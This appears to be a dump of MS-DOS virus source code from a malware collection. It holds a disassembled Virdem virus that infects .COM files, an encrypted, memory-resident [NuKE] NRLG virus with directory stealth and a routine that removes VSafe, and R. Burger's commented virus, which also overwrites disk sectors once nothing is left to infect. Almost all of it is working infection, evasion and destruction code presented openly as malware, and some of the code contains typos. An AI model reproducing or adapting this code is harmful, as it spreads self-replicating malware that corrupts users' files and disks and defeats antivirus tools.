jmp short loc_3 ; (016D)
db 90h
loc_2: ; xref 8C04:0191, 01A0
mov ah,40h ; '@'
mov bx,1
mov cx,34h
nop
lea dx,cs:[57Ch] ; Load effective addr
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
mov dx,cs:data_6 ; (8C04:0391=600h)
mov cs:data_17e,dx ; (8C04:FD00=0)
jmp loc_12 ; (02E4)
jmp loc_12 ; (02E4)
loc_3: ; xref 8C04:014B
mov dl,0
mov ah,0Eh
int 21h ; DOS Services ah=function 0Eh
; set default drive dl (0=a:)
mov ah,3Bh ; ';'
lea dx,cs:[3DFh] ; Load effective addr
int 21h ; DOS Services ah=function 3Bh
; set current dir, path @ ds:dx
jmp short loc_7 ; (01C9)
db 90h
loc_4: ; xref 8C04:01D4, 01E7
mov ah,3Bh ; ';'
lea dx,cs:[3DFh] ; Load effective addr
int 21h ; DOS Services ah=function 3Bh
; set current dir, path @ ds:dx
mov ah,4Eh ; 'N'
mov cx,11h
lea dx,cs:[399h] ; Load effective addr
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_2 ; Jump if carry Set
mov bx,cs:data_5 ; (8C04:038F=0)
inc bx
dec bx
jz loc_6 ; Jump if zero
loc_5: ; xref 8C04:01A3
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_2 ; Jump if carry Set
dec bx
jnz loc_5 ; Jump if not zero
loc_6: ; xref 8C04:019A
mov ah,2Fh ; '/'
int 21h ; DOS Services ah=function 2Fh
; get DTA ptr into es:bx
add bx,1Ch
mov word ptr es:[bx],5C20h
inc bx
push ds
mov ax,es
mov ds,ax
mov dx,bx
mov ah,3Bh ; ';'
int 21h ; DOS Services ah=function 3Bh
; set current dir, path @ ds:dx
pop ds
mov bx,cs:data_5 ; (8C04:038F=0)
inc bx
mov cs:data_5,bx ; (8C04:038F=0)
loc_7: ; xref 8C04:017B
mov ah,4Eh ; 'N'
mov cx,1
lea dx,cs:[393h] ; Load effective addr
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_4 ; Jump if carry Set
mov bx,es:data_5 ; (8C04:038F=0)
cmp bx,0
je loc_8 ; Jump if equal
jmp short loc_9 ; (01E9)
db 90h
loc_8: ; xref 8C04:01DE, 020D
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_4 ; Jump if carry Set
loc_9: ; xref 8C04:01E0
mov ah,3Dh ; '='
mov al,2
mov dx,data_2e ; (8C04:009E=0)
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
mov ah,3Fh ; '?'
mov cx,500h
nop
mov dx,data_16e ; (8C04:F800=0)
nop
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
mov bx,cs:data_16e ; (8C04:F800=0)
cmp bx,9090h
je loc_8 ; Jump if equal
mov ah,43h ; 'C'
mov al,0
mov dx,data_2e ; (8C04:009E=0)
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
mov ah,43h ; 'C'
mov al,1
and cx,0FEh
int 21h ; DOS Services ah=function 43h
; get/set file attrb, nam@ds:dx
mov ah,3Dh ; '='
mov al,2
mov dx,data_2e ; (8C04:009E=0)
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
mov ah,57h ; 'W'
mov al,0
int 21h ; DOS Services ah=function 57h
; get/set file date & time
push cx
push dx
mov ah,42h ; 'B'
mov al,2
mov dx,0
mov cx,0
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
test ax,8000h
jnz loc_10 ; Jump if not zero
cmp ax,500h
nop
ja loc_10 ; Jump if above
call sub_3 ; (0380)
loc_10: ; xref 8C04:0244, 024A
push ax
push dx
mov ah,40h ; '@'
mov cx,500h
nop
mov dx,data_16e ; (8C04:F800=0)
nop
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
pop dx
pop ax
add ax,100h
mov es:data_4,ax ; (8C04:02BD=0)
add ax,500h
nop
mov dx,cs:data_6 ; (8C04:0391=600h)
mov cs:data_17e,dx ; (8C04:FD00=0)
mov es:data_6,ax ; (8C04:0391=600h)
mov ah,40h ; '@'
mov cx,38h
nop
lea dx,cs:[287h] ; Load effective addr
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
jmp short loc_11 ; (02C0)
db 90h
db 0BFh, 80h, 00h, 8Dh, 36h,0BFh
db 03h,0B9h, 20h, 00h,0F3h,0A4h
db 0E8h, 00h, 00h
virdem endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_1 proc near
pop ax
mov bx,27h
nop
add ax,bx
mov si,ax
mov bx,es:[si]
mov si,bx
mov di,offset ds:[100h] ; (8C04:0100=90h)
mov cx,500h
nop
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
popf ; Pop flags
pop ss
pop es
pop ds
pop di
pop si
pop bp
pop dx
pop cx
pop bx
pop ax
mov ax,offset start
push ax
ret
sub_1 endp
data_4 dw 0 ; xref 8C04:0262
db 90h
loc_11: ; xref 8C04:0284
mov ah,42h ; 'B'
mov al,0
mov dx,0
mov cx,0
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov ah,40h ; '@'
mov cx,500h
nop
lea dx,cs:[100h] ; Load effective addr
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
mov ah,57h ; 'W'
mov al,1
pop dx
pop cx
int 21h ; DOS Services ah=function 57h
; get/set file date & time
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
loc_12: ; xref 8C04:0167, 016A
nop
call sub_2 ; (036E)
mov bl,byte ptr es:data_12+0Dh ; (8C04:0422=30h)
cmp bl,31h ; '1'
jne loc_13 ; Jump if not equal
mov ah,40h ; '@'
mov bx,1
mov cx,67h
nop
lea dx,cs:[404h] ; Load effective addr
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
mov ah,0
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
loc_13: ; xref 8C04:02F0
mov ah,40h ; '@'
mov bx,1
mov cx,102h
nop
lea dx,cs:[404h] ; Load effective addr
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
mov ah,2
mov bl,byte ptr es:data_12+0Dh ; (8C04:0422=30h)
mov dl,bl
int 21h ; DOS Services ah=function 02h
; display char dl
mov ah,2Ch ; ','
int 21h ; DOS Services ah=function 2Ch
; get time, cx=hrs/min, dh=sec
mov ah,0Ch
mov al,1
int 21h ; DOS Services ah=function 0Ch
; clear keybd buffer & input al
or dl,30h ; '0'
and dl,bl
cmp dl,al
je loc_14 ; Jump if equal
mov bl,dl
mov ah,2
mov dl,20h ; ' '
int 21h ; DOS Services ah=function 02h
; display char dl
mov dl,3Eh ; '>'
int 21h ; DOS Services ah=function 02h
; display char dl
mov dl,bl
int 21h ; DOS Services ah=function 02h
; display char dl
mov dl,3Ch ; '<'
int 21h ; DOS Services ah=function 02h
; display char dl
mov ah,40h ; '@'
mov bx,1
mov cx,3Ch
nop
lea dx,cs:[507h] ; Load effective addr
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
mov ah,0
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
loc_14: ; xref 8C04:0330
mov ah,40h ; '@'
mov bx,1
mov cx,37h
nop
lea dx,cs:[544h] ; Load effective addr
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
mov ax,es:data_17e ; (8C04:FD00=0)
push ax
ret
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;
; Called from: 8C04:02E5
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_2 proc near
mov ah,0Eh
mov dl,cs:data_10 ; (8C04:03E1=0)
int 21h ; DOS Services ah=function 0Eh
; set default drive dl (0=a:)
mov ah,3Bh ; ';'
lea dx,cs:[3E2h] ; Load effective addr
int 21h ; DOS Services ah=function 3Bh
; set current dir, path @ ds:dx
ret
sub_2 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;
; Called from: 8C04:024C
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_3 proc near
mov ah,42h ; 'B'
mov al,0
mov dx,500h
nop
mov cx,0
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
ret
sub_3 endp
db 0
data_5 dw 0 ; xref 8C04:0120, 0193, 01BE, 01C4
; 01D6
data_6 dw 600h ; xref 8C04:015D, 026A, 0274
db "*.com", 00h
db 2Ah, 00h,0FFh, 00h, 00h, 00h
db 00h, 00h, 3Fh, 00h
db "????????exe"
db 00h, 00h, 00h
db 00h, 00h
db "????????com"
db 33 dup (0)
db 5Ch, 00h
data_10 db 0 ; xref 8C04:0139, 0370
db 5Ch
db 33 dup (0)
db 'Virdem Ver.: 1.06'
data_12 db ' (Generation 0) aktive.', 0Ah, 0Dh
copyright db 'Copyright by R.Burger 1986,1987'
db 0Ah, 0Dh, 'Phone.: D - 05932/5451'
db ' ', 0Ah, 0Dh, ' ', 0Ah, 0Dh, 'T'
db 'his is a demoprogram for ', 0Ah, 0Dh
db 'computerviruses. Please put in a'
db ' ', 0Ah, 0Dh, 'number now.', 0Ah
db 0Dh, 'If you', 27h, 're right, yo'
db 'u', 27h, 'll be', 0Ah, 0Dh, 'abl'
db 'e to continue.', 0Ah, 0Dh, 'The '
db 'number is between ', 0Ah, 0Dh, '0'
db ' and ', 0
db 0Ah, 0Dh, 'Sorry, you', 27h, 're '
db 'wrong', 0Ah, 0Dh, ' ', 0Ah
db 0Dh, 'More luck at next try ....', 0Ah
db 0Dh, 0
db 0Ah, 0Dh, 'Famous. You', 27h, 're'
db ' right.', 0Ah, 0Dh, 'You', 27h, 'l'
db 'l be able to continue. ', 0Ah, 0Dh
db 0
db 0Ah, 0Dh, 'All your programs are', 0Ah
db 0Dh, 'struck by VIRDEM.COM now.', 0Ah
db 0Dh
db 0
seg_a ends
end start
±±±±±±±±±±±±±±±±±±±± CROSS REFERENCE - KEY ENTRY POINTS ±±±±±±±±±±±±±±±±±±±
seg:off type label
---- ---- ---- ---------------
8C04:0100 far start
±±±±±±±±±±±±±±±±±± Interrupt Usage Synopsis ±±±±±±±±±±±±±±±±±±
Interrupt 21h : terminate, cs=progm seg prefx
Interrupt 21h : display char dl
Interrupt 21h : clear keybd buffer & input al
Interrupt 21h : set default drive dl (0=a:)
Interrupt 21h : get default drive al (0=a:)
Interrupt 21h : get time, cx=hrs/min, dh=sec
Interrupt 21h : get DTA ptr into es:bx
Interrupt 21h : set current dir, path @ ds:dx
Interrupt 21h : open file, al=mode,name@ds:dx
Interrupt 21h : close file, bx=file handle
Interrupt 21h : read file, cx=bytes, to ds:dx
Interrupt 21h : write file cx=bytes, to ds:dx
Interrupt 21h : move file ptr, cx,dx=offset
Interrupt 21h : get/set file attrb, nam@ds:dx
Interrupt 21h : get present dir,drive dl,1=a:
Interrupt 21h : find 1st filenam match @ds:dx
Interrupt 21h : find next filename match
Interrupt 21h : get/set file date & time
±±±±±±±±±±±±±±±±±± I/O Port Usage Synopsis ±±±±±±±±±±±±±±±±±±
No I/O ports used.

473
MSDOS/Virus.MSDOS.Unknown.virus.asm Normal file
View File

@ -0,0 +1,473 @@
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
.286
code segment
assume cs:code,ds:code
org 100h
start: CALL NEXT
NEXT:
mov di,sp ;take the stack pointer location
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
sub bp,offset next ;subtract the large code off this code
;
;*******************************************************************
; #1 DECRYPT ROUTINE
;*******************************************************************
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
je crypt2 ;yes! not decrypt
;----------------------------------------------------------
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt]+ bp ;di = first byte to decrypt
mov dx,1 ;dx = value for decrypt
;----------------------------------------------------------
deci: ;deci = fuck label!
;----------------------------------------------------------
ÿsub byte ptr [di],059h
xor word ptr [di],0cb6fh
not word ptr [di]
inc byte ptr [di]
add byte ptr [di],03fh
xor word ptr [di],01bd8h
sub word ptr [di],05c54h
sub word ptr [di],0ccdh
not word ptr [di]
not word ptr [di]
inc word ptr [di]
not word ptr [di]
not word ptr [di]
inc byte ptr [di]
sub word ptr [di],0f965h
inc word ptr [di]
sub byte ptr [di],072h
ÿinc di
inc di
;----------------------------------------------------------
jmp bye ;######## BYE BYE F-PROT ! ##########
mov ah,4ch
int 21h
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
;-----------------------------------------------------------
mov ah,0bh ;######### BYE BYE TBAV ! ##########
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
;----------------------------------------------------------
loop deci ;repeat please!
;
;*****************************************************************
; #2 DECRYPT ROUTINE
;*****************************************************************
;
crypt: ;fuck label!
;
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt2] + bp ;di = first byte to decrypt
;---------------------------------------------------------------
deci2: ;
xor byte ptr cs:[di],1 ;decrytion rutine
inc di ;very simple...
loop deci2 ;
;---------------------------------------------------------------
crypt2: ;fuck label!
;
MOV AX,0CACAH ;call to my resident interrup mask
INT 21H ;for chek "I'm is residet?"
CMP Bh,0CAH ;is equal to CACA?
JE PUM2 ;yes! jump to runnig program
call action
;*****************************************************************
; NRLG FUNCTIONS (SELECTABLE)
;*****************************************************************
ÿcall ANTI_V
;****************************************************************
; PROCESS TO REMAIN RESIDENT
;****************************************************************
mov ax,3521h
int 21h ;store the int 21 vectors
mov word ptr [bp+int21],bx ;in cs:int21
mov word ptr [bp+int21+2],es ;
;---------------------------------------------------------------
push cs ;
pop ax ;ax = my actual segment
dec ax ;dec my segment for look my MCB
mov es,ax ;
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
;---------------------------------------------------------------
push cs ;
pop es ;
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
sub bx,17 + offset fin ;and 100H for the PSP total
mov ah,4ah ;used memory
int 21h ;put the new value to MCB
;---------------------------------------------------------------
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
mov ah,48h ;
int 21h ;request the memory to fuck DOS!
;---------------------------------------------------------------
dec ax ;ax=new segment
mov es,ax ;ax-1= new segment MCB
mov byte ptr es:[1],8 ;put '8' in the segment
;--------------------------------------------------------------
inc ax ;
mov es,ax ;es = new segment
lea si,[bp + offset start] ;si = start of virus
mov di,100h ;di = 100H (psp position)
mov cx,offset fin - start ;cx = lag of virus
push cs ;
pop ds ;ds = cs
cld ;mov the code
rep movsb ;ds:si >> es:di
;--------------------------------------------------------------
mov dx,offset virus ;dx = new int21 handler
mov ax,2521h ;
push es ;
pop ds ;
int 21h ;set the vectors
;-------------------------------------------------------------
pum2: ;
;
mov ah,byte ptr [cs:bp + real] ;restore the 3
mov byte ptr cs:[100h],ah ;first bytes
mov ax,word ptr [cs:bp + real + 1] ;
mov word ptr cs:[101h],ax ;
;-------------------------------------------------------------
mov ax,100h ;
jmp ax ;jmp to execute
;
;*****************************************************************
;* HANDLER FOR THE INT 21H
;*****************************************************************
;
VIRUS: ;
;
cmp ah,4bh ;is a 4b function?
je REPRODUCCION ;yes! jump to reproduce !
cmp ah,11h
je dir
cmp ah,12h
je dir
dirsal:
cmp AX,0CACAH ;is ... a caca function? (resident chek)
jne a3 ;no! jump to a3
mov bh,0cah ;yes! put ca in bh
a3: ;
JMP dword ptr CS:[INT21] ;jmp to original int 21h
ret ;
make db '[NuKE] N.R.L.G. AZRAEL'
dir:
jmp dir_s
;-------------------------------------------------------------
REPRODUCCION: ;
;
pushf ;put the register
pusha ;in the stack
push si ;
push di ;
push bp ;
push es ;
push ds ;
;-------------------------------------------------------------
push cs ;
pop ds ;
mov ax,3524H ;get the dos error control
int 21h ;interupt
mov word ptr error,es ;and put in cs:error
mov word ptr error+2,bx ;
mov ax,2524H ;change the dos error control
mov dx,offset all ;for my "trap mask"
int 21h ;
;-------------------------------------------------------------
pop ds ;
pop es ;restore the registers
pop bp ;
pop di ;
pop si ;
popa ;
popf ;
;-------------------------------------------------------------
pushf ;put the registers
pusha ;
push si ;HEY! AZRAEL IS CRAZY?
push di ;PUSH, POP, PUSH, POP
push bp ;PLEEEEEAAAAAASEEEEEEEEE
push es ;PURIFY THIS SHIT!
push ds ;
;-------------------------------------------------------------
mov ax,4300h ;
int 21h ;get the file
mov word ptr cs:[attrib],cx ;atributes
;-------------------------------------------------------------
mov ax,4301h ;le saco los atributos al
xor cx,cx ;file
int 21h ;
;-------------------------------------------------------------
mov ax,3d02h ;open the file
int 21h ;for read/write
mov bx,ax ;bx=handle
;-------------------------------------------------------------
mov ax,5700h ;
int 21h ;get the file date
mov word ptr cs:[hora],cx ;put the hour
mov word ptr cs:[dia],dx ;put the day
and cx,word ptr cs:[fecha] ;calculate the seconds
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
jne seguir ;yes! the file is infected!
jmp cerrar ;
;------------------------------------------------------------
seguir: ;
mov ax,4202h ;move the pointer to end
call movedor ;of the file
;------------------------------------------------------------
push cs ;
pop ds ;
sub ax,3 ;calculate the
mov word ptr [cs:largo],ax ;jmp long
;-------------------------------------------------------------
mov ax,04200h ;move the pointer to
call movedor ;start of file
;----------------------------------------------------------
push cs ;
pop ds ;read the 3 first bytes
mov ah,3fh ;
mov cx,3 ;
lea dx,[cs:real] ;put the bytes in cs:[real]
int 21h ;
;----------------------------------------------------------
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
jne er1 ;yes! is a EXE... fuckkk!
;----------------------------------------------------------
jmp cerrar
er1:
;----------------------------------------------------------
mov ax,4200h ;move the pointer
call movedor ;to start fo file
;----------------------------------------------------------
push cs ;
pop ds ;
mov ah,40h ;
mov cx,1 ;write the JMP
lea dx,[cs:jump] ;instruccion in the
int 21h ;fist byte of the file
;----------------------------------------------------------
mov ah,40h ;write the value of jmp
mov cx,2 ;in the file
lea dx,[cs:largo] ;
int 21h ;
;----------------------------------------------------------
mov ax,04202h ;move the pointer to
call movedor ;end of file
;----------------------------------------------------------
push cs ;
pop ds ;move the code
push cs ;of my virus
pop es ;to cs:end+50
cld ;for encrypt
mov si,100h ;
mov di,offset fin + 50 ;
mov cx,offset fin - 100h ;
rep movsb ;
;----------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
enc: ;
xor byte ptr cs:[di],1 ;encrypt the virus
inc di ;code
loop enc ;
;---------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt - offset start) ;virus
mov dx,1
enc2: ;
ÿadd byte ptr [di],072h
dec word ptr [di]
add word ptr [di],0f965h
dec byte ptr [di]
not word ptr [di]
not word ptr [di]
dec word ptr [di]
not word ptr [di]
not word ptr [di]
add word ptr [di],0ccdh
add word ptr [di],05c54h
xor word ptr [di],01bd8h
sub byte ptr [di],03fh
dec byte ptr [di]
not word ptr [di]
xor word ptr [di],0cb6fh
add byte ptr [di],059h
ÿinc di
inc di ;the virus code
loop enc2 ;
;--------------------------------------------
mov ah,40h ;
mov cx,offset fin - offset start ;copy the virus
mov dx,offset fin + 50 ;to end of file
int 21h ;
;----------------------------------------------------------
cerrar: ;
;restore the
mov ax,5701h ;date and time
mov cx,word ptr cs:[hora] ;file
mov dx,word ptr cs:[dia] ;
or cx,word ptr cs:[fecha] ;and mark the seconds
int 21h ;
;----------------------------------------------------------
mov ah,3eh ;
int 21h ;close the file
;----------------------------------------------------------
pop ds ;
pop es ;restore the
pop bp ;registers
pop di ;
pop si ;
popa ;
popf ;
;----------------------------------------------------------
pusha ;
;
mov ax,4301h ;restores the atributes
mov cx,word ptr cs:[attrib] ;of the file
int 21h ;
;
popa ;
;----------------------------------------------------------
pushf ;
pusha ; 8-( = f-prot
push si ;
push di ; 8-( = tbav
push bp ;
push es ; 8-) = I'm
push ds ;
;----------------------------------------------------------
mov ax,2524H ;
lea bx,error ;restore the
mov ds,bx ;errors handler
lea bx,error+2 ;
int 21h ;
;----------------------------------------------------------
pop ds ;
pop es ;
pop bp ;restore the
pop di ;resgisters
pop si ;
popa ;
popf ;
;----------------------------------------------------------
JMP A3 ;jmp to orig. INT 21
;
;**********************************************************
; SUBRUTINES AREA
;**********************************************************
;
movedor: ;
;
xor cx,cx ;use to move file pointer
xor dx,dx ;
int 21h ;
ret ;
;----------------------------------------------------------
all: ;
;
XOR AL,AL ;use to set
iret ;error flag
;***********************************************************
; DATA AREA
;***********************************************************
largo dw ?
jump db 0e9h
real db 0cdh,20h,0
hora dw ?
dia dw ?
attrib dw ?
int21 dd ?
error dd ?
ÿ;---------------------------------
action: ;
MOV AH,2AH ;
INT 21H ;get date
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
JE cont ;nop! fuck ret
cmp byte ptr cs:[action_dia+bp],32 ;
jne no_day ;
cont: ;
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
je set ;
cmp byte ptr cs:[action_mes+bp],13 ;
jne NO_DAY ;nop! fuck ret
set: ;
mov cx,50 ;50 beep's!
beep: ;beep label!
mov ax,0E07h ;
int 10h ;print beep char
loop beep ;go!
NO_DAY: ;
ret ;
;---------------------------------
ÿ;---------------------------------
ANTI_V: ;
MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY
MOV DX,5945H ;
INT 21H ;
ret ;
;---------------------------------
ÿ;*****************************************************
dir_s:
pushf
push cs
call a3 ;Get file Stats
test al,al ;Good FCB?
jnz no_good ;nope
push ax
push bx
push es
mov ah,51h ;Is this Undocmented? huh...
int 21h
mov es,bx
cmp bx,es:[16h]
jnz not_infected
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh ;Get file DTA
int 21h
pop ax
inc al
jnz fcb_okay
add bx,7h
fcb_okay: mov ax,es:[bx+17h]
and ax,1fh ;UnMask Seconds Field
xor al,byte ptr cs:fechad
jnz not_infected
and byte ptr es:[bx+17h],0e0h
sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size
sbb es:[bx+1fh],ax
not_infected:pop es
pop bx
pop ax
no_good: iret
;********************************************************************
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
;*********************************************************************
ÿaction_dia Db 020H ;day for the action
action_mes Db 0dH ;month for the action
FECHA DW 01eH ;Secon for mark
FECHAd Db 01eH ;Secon for mark dir st
fin:
code ends
end start

396
MSDOS/Virus.MSDOS.Unknown.virus0b.asm Normal file
View File

@ -0,0 +1,396 @@
; Virus in Assembly Language
; --------------------------
;Most viruses out there have been written in assembly because assembly has the
;unique ability to bypass operating system security.
;Here is an example of a virus written under MS-DOS 2.1 and can obviously be
;compiled in the later versions. The article contains remarks so as to further
;explain the parts. Programmers may wish to delete those segments if desired.
;**************************************************
; Program Virus
; Version 1.1
; Writter : R. Burger
; Created 1986
; This is a demonstration program for computer
; viruses. It has the ability to replace itself.
; and thereby modify other programs. Enjoy.
;**************************************************
Code Segment
Assume CS:Code
progr equ 100h
ORG progr
;**************************************************
; The three NOP's serve as the marker byte of the
; virus which allow it to identify a virus.
;**************************************************
MAIN:
nop
nop
nop
;**************************************************
; Initialize the pointers
;**************************************************
mov ax,00
mov es:[pointer],ax
mov es:[counter],ax
mov es:[disks],al
;**************************************************
; Get the selected drive
;**************************************************
mov ah,19h ;drive?
int 21h
;**************************************************
; Get the current path on the current drive
;**************************************************
mov cs:drive,al ;save drive
mov ah,47h ;dir?
mov dh,0
add al,1
mov dl,al ;in actual drive
lea si,cs:old_path ;
int 21h
;**************************************************
; Get the number of drives present. If only one
; is present, the pointer for the search order
; will be set to serach order + 6
;**************************************************
mov as,0eh ;how many disks
mov dl,0 ;
int 21h
mov al,01
cmp al,01 ;one drive
jnz hups3
mov al,06
hups3: mov ah,0
lea bx,search_order
add bx,ax
add bx,0001h
mov cs:pointer,bx
clc
;**************************************************
; Carry is set, if no more .COM's are found.
; Then, to avoid unnecessary work, .EXE files will
; be renamed to .COM files and infected.
; This causes the error message "Program to large
; to fit memory" when starting larger infected
; EXE programs.
;*************************************************
change_disk:
jnc no_name_change
mov ah,17h ;change .EXE to .COM
lea dx,cs:maske_exe
int 21h
cmp al,0ffh
jnz no_name_change ;.EXE found?
;****************************************************
; If neither .COM nor .EXE is found then sectors
; will be overwritten depending on the system time
; in milliseconds. This is the time of the complete
; "infection" of a storage medium. The virus can
; find nothing more to infect and starts its destruction
;*****************************************************
mov ah,2ch ; read system clock
int 21h
mov bx,cs:pointer
mov al,cs:[bx]
mov bx,dx
mov cx,2
mov dh,0
int 26h ; write crap on disk
;******************************************************
; Check if the end of the search order table has been
; reached . If so, end.
;******************************************************
no_name_change:
mov bx,cs:pointer
dec bx
mov cs:pointer,bx
mov dl,cs:[bx]
cmp dl,0ffh
jnz hups2
jmp hops
;****************************************************
; Get new drive from the search order table and
; select it .
;***************************************************
hups2:
mov ah,0eh
int 21h ;change disk
;***************************************************
; Start in the root directory
;***************************************************
mov ah,3bh ;change path
lea dx,path
int 21h
jmp find_first_file
;**************************************************
; Starting from the root, search for the first
; subdir. FIrst convert all .EXE files to .COM
; in the old directory
;**************************************************
find_first_subdir:
mov ah,17h ;change .exe to .com
lea dx,cs:maske_exe
int 21h
mov ah,3bh ;use root directory
lea dx,path
int 21h
mov ah,04eh ;search for first subdirectory
mov cx,00010001b ;dir mask
lea dx,maske_dir ;
int 21h ;
jc change_disk
mov bx,CS:counter
INC,BX
DEC bx
jz use_next_subdir
;*************************************************
; Search for the next subdirectory. If no more
; directories are found, the drive will be changed.
;*************************************************
find_next_subdir:
mov ah,4fh ; search for next subdir
int 21h
jc change_disk
dec bx
jnz find_next_subdir
;*************************************************
; Select found directory.
;**************************************************
use_next_subdir:
mov ah,2fh ;get dta address
int 21h
add bx,1ch
mov es:[bx],'\` ;address of name in dta
inc bx
push ds
mov ax,es
mov ds,ax
mov dx,bx
mov ah,3bh ;change path
int 21h
pop ds
mov bx,cs:counter
inc bx
mov CS:counter,bx
;**************************************************
; Find first .COM file in the current directory.
; If there are none, search the next directory.
;**************************************************
find_first_file:
mov ah,04eh ;Search for first
mov cx,00000001b ;mask
lea dx,maske_com ;
int 21h ;
jc find_first_subdir
jmp check_if_ill
;**************************************************
; If program is ill(infected) then search for
; another other.
;**************************************************
find_next_file:
mov ah,4fh ;search for next
int 21h
jc find_first_subdir
;*************************************************
; Check is already infected by virus.
;**************************************************
check_if_ill:
mov ah,3dh ;open channel
mov al,02h ;read/write
mov dx,9eh ;address of name in dta
int 21
mov bx,ax ;save channel
mov ah,3fh ; read file
mov ch,buflen ;
mov dx,buffer ;write in buffer
int 21h
mov ah,3eh ;close file
int 21h
;***************************************************
; This routine will search the three NOP's(no
; operation).If present there is already an infection.
; We must then continue the search
;****************************************************
mov bx,cs:[buffer]
cmp bx,9090h
jz find_next_file
;***************************************************
; This routine will BY PASS MS-DOS WRITE PROTECTION
; if present. Very important !
;***************************************************
mov ah,43h ;write enable
mov al,0
mov dx,9eh ;address of name in dta
int 21h
mov ah,43h
mov al,01h
and cx,11111110b
int 21h
;****************************************************
; Open file for read/write access.
;*****************************************************
mov ah,3dh ;open channel
mov al,02h ;read/write
mov dx,9eh ;address of name in dta
int 21h
;****************************************************
; Read date entry of program and save for future
; use.
;****************************************************
mov bx,ax ;channel
mov ah,57h ;get date
mov al.0
int 21h
push cx ;save date
push dx
;****************************************************
; The jump located at address 0100h of the program
; will be saved for further use.
;*****************************************************
mov dx,cs:[conta] ;save old jmp
mov cs:[jmpbuf],dx
